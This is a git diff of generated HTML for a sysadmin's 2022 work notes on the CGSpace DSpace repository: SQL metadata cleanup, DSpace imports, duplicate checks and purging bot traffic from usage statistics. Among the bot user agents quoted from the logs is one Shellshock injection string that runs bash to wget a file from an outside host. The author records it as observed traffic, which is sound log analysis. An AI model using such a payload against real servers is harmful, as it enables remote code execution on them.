                                                                                                                                                                                                                                                                                                                                                                                                                                            • I saw that the index on metadatavalue shrunk by about 200MB!
                                                                                                                                                                                                                                                                                                                                                                                                                                            • After testing a few things I dropped the old cluster:
                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                            # pg_dropcluster 10 main
                                                                                                                                                                                                                                                                                                                                                                                                                                            -# dpkg -l | grep postgresql-10 | awk '{print $2}' | xargs dpkg -r
                                                                                                                                                                                                                                                                                                                                                                                                                                            -

                                                                                                                                                                                                                                                                                                                                                                                                                                            2022-02-17

                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            # pg_dropcluster 10 main
                                                                                                                                                                                                                                                                                                                                                                                                                                            +# dpkg -l | grep postgresql-10 | awk '{print $2}' | xargs dpkg -r
                                                                                                                                                                                                                                                                                                                                                                                                                                            +

                                                                                                                                                                                                                                                                                                                                                                                                                                            2022-02-17

                                                                                                                                                                                                                                                                                                                                                                                                                                            • I updated my migrate-fields.sh script to use field names instead of IDs
                                                                                                                                                                                                                                                                                                                                                                                                                                                @@ -582,25 +582,25 @@ $ psql dspace < /tmp/reindex.sql
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Normalize the text_lang attributes of metadata on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                                                                                                                                                                                - text_lang |  count  
                                                                                                                                                                                                                                                                                                                                                                                                                                                ------------+---------
                                                                                                                                                                                                                                                                                                                                                                                                                                                - en_US     | 2838588
                                                                                                                                                                                                                                                                                                                                                                                                                                                - en        |    1082
                                                                                                                                                                                                                                                                                                                                                                                                                                                -           |     801
                                                                                                                                                                                                                                                                                                                                                                                                                                                - fr        |       2
                                                                                                                                                                                                                                                                                                                                                                                                                                                - vn        |       2
                                                                                                                                                                                                                                                                                                                                                                                                                                                - en_US.    |       1
                                                                                                                                                                                                                                                                                                                                                                                                                                                - sp        |       1
                                                                                                                                                                                                                                                                                                                                                                                                                                                -           |       0
                                                                                                                                                                                                                                                                                                                                                                                                                                                -(8 rows)
                                                                                                                                                                                                                                                                                                                                                                                                                                                -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', 'en_US.', '');
                                                                                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 1884
                                                                                                                                                                                                                                                                                                                                                                                                                                                -dspace=# UPDATE metadatavalue SET text_lang='vi' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('vn');
                                                                                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                -dspace=# UPDATE metadatavalue SET text_lang='es' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('sp');
                                                                                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + text_lang |  count  
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +-----------+---------
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + en_US     | 2838588
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + en        |    1082
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +           |     801
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + fr        |       2
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + vn        |       2
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + en_US.    |       1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  + sp        |       1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +           |       0
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +(8 rows)
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', 'en_US.', '');
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 1884
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +dspace=# UPDATE metadatavalue SET text_lang='vi' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('vn');
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +dspace=# UPDATE metadatavalue SET text_lang='es' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('sp');
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I then exported the entire repository and did some cleanup on DOIs
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I found ~1,200 items with no cg.identifier.doi, but which had a DOI in their citation
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -623,8 +623,8 @@ UPDATE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  abs(diff(toDate(cells["issued"].value),toDate(cells["dcterms.issued[en_US]"].value), "days"))
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    abs(diff(toDate(cells["issued"].value),toDate(cells["dcterms.issued[en_US]"].value), "days"))
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • In most cases Crossref’s dates are more correct than ours, though there are a few odd cases that I don’t know what strategy I want to use yet
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Start a full harvest on AReS
                                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -639,26 +639,26 @@ UPDATE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                or(
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1017"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1007"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1016"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1098"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1111"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1002"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1046"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.2135"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1006"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1177"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1079"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.2298"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1186"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.3835"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.1128"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.3732"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                -value.contains("10.2134")
                                                                                                                                                                                                                                                                                                                                                                                                                                                -)
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  or(
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1017"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1007"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1016"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1098"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1111"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1002"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1046"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.2135"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1006"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1177"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1079"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.2298"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1186"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.3835"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.1128"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.3732"),
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +value.contains("10.2134")
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +)
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Many many of Crossref’s records are correct where we have no license, and in some cases more correct when we have a different license
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I ran license updates on ~167 DOIs in the end on CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -669,11 +669,11 @@ value.contains("10.2134")
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Update some audience metadata on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'Academicians';
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -UPDATE 354
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -dspace=# UPDATE metadatavalue SET text_value='Scientists' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'SCIENTISTS';
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -

                                                                                                                                                                                                                                                                                                                                                                                                                                                      2022-02-25

                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'Academicians';
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +UPDATE 354
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +dspace=# UPDATE metadatavalue SET text_value='Scientists' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'SCIENTISTS';
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +

                                                                                                                                                                                                                                                                                                                                                                                                                                                      2022-02-25

                                                                                                                                                                                                                                                                                                                                                                                                                                                      • A few days ago Gaia sent me her notes on the third batch of TAC/ICW documents (items 401–700 in the spreadsheet)
                                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -682,23 +682,23 @@ UPDATE 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                        or(
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('405')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('410')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('412')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('414')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('419')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('436')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('448')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('449')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('450')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('405')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('410')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('412')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('414')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('419')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('436')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('448')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('449')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('450')),
                                                                                                                                                                                                                                                                                                                                                                                                                                                         ...
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -isNotNull(value.match('699'))
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +isNotNull(value.match('699'))
                                                                                                                                                                                                                                                                                                                                                                                                                                                         )
                                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-25-tac-batch3-401to700.map
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -

                                                                                                                                                                                                                                                                                                                                                                                                                                                        2022-02-26

                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-25-tac-batch3-401to700.map
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +

                                                                                                                                                                                                                                                                                                                                                                                                                                                        2022-02-26

                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Upgrade CGSpace (linode18) to Ubuntu 20.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Start a full AReS harvest
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • diff --git a/docs/2022-03/index.html b/docs/2022-03/index.html index 1b342c6ec..2b40a6480 100644 --- a/docs/2022-03/index.html +++ b/docs/2022-03/index.html @@ -19,7 +19,7 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv & - + @@ -34,7 +34,7 @@ $ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu& $ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv "/> - + @@ -44,9 +44,9 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv & "@type": "BlogPosting", "headline": "March, 2022", "url": "https://alanorth.github.io/cgspace-notes/2022-03/", - "wordCount": "48", + "wordCount": "349", "datePublished": "2022-03-01T16:46:54+03:00", - "dateModified": "2022-03-01T16:46:54+03:00", + "dateModified": "2022-03-01T17:48:40+03:00", "author": { "@type": "Person", "name": "Alan Orth" @@ -124,11 +124,67 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Send Gaia the last batch of potential duplicates for items 701 to 980:
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                                                                                                                                                                          2022-03-04

                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Looking over the CGSpace Solr statistics from 2022-02 +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Here are some of the more prevalent or weird ones: +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • axios/0.21.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Nutraspace/Nutch-1.2 (www.nutraspace.com)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Crowsnest/0.5 (+http://www.crowsnest.tv/)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • metha/0.2.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • ZaloPC-win32-24v454
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • FullStoryBot/1.0 (+https://www.fullstory.com)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Link Validity Check From: http://www.usgs.gov
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • OSPScraper (+https://www.opensyllabusproject.org)
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • () { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • I submitted a pull request to COUNTER-Robots with some of these
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I purged a bunch of hits from the stats using the check-spider-hits.sh script:
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          ]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 6 hits from scalaj-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 5 hits from lua-resty-http in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 9 hits from AHC in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 7 hits from acebookexternalhit in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1011 hits from axios\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 2216 hits from Faveeo\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1164 hits from Moreover\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 740 hits from Exploratodo\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 585 hits from GroupHigh\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 438 hits from Crowsnest\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1326 hits from nbertaupete95 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 182 hits from metha\/[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 68 hits from ZaloPC-win32-24v454 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1644 hits from Firefox\/x\.x in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 678 hits from ZoteroTranslationServer in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 27 hits from FullStoryBot in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 26 hits from Link Validity Check in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 26 hits from OSPScraper in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 1 hits from 3137382e37392e3138372e313832 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Purging 2755 hits from Nutch-[0-9] in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Total number of bot hits purged: 12914
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          + diff --git a/docs/404.html b/docs/404.html index 346a9a9be..bad881cbf 100644 --- a/docs/404.html +++ b/docs/404.html @@ -17,7 +17,7 @@ - + diff --git a/docs/categories/index.html b/docs/categories/index.html index e6cccf6c9..b220663f4 100644 --- a/docs/categories/index.html +++ b/docs/categories/index.html @@ -10,14 +10,14 @@ - + - + diff --git a/docs/categories/notes/index.html b/docs/categories/notes/index.html index 5a861de61..d3c79ee31 100644 --- a/docs/categories/notes/index.html +++ b/docs/categories/notes/index.html @@ -10,14 +10,14 @@ - + - + @@ -94,11 +94,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Send Gaia the last batch of potential duplicates for items 701 to 980:
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          Read more → @@ -170,13 +170,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Atmire merged some changes I had submitted to the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
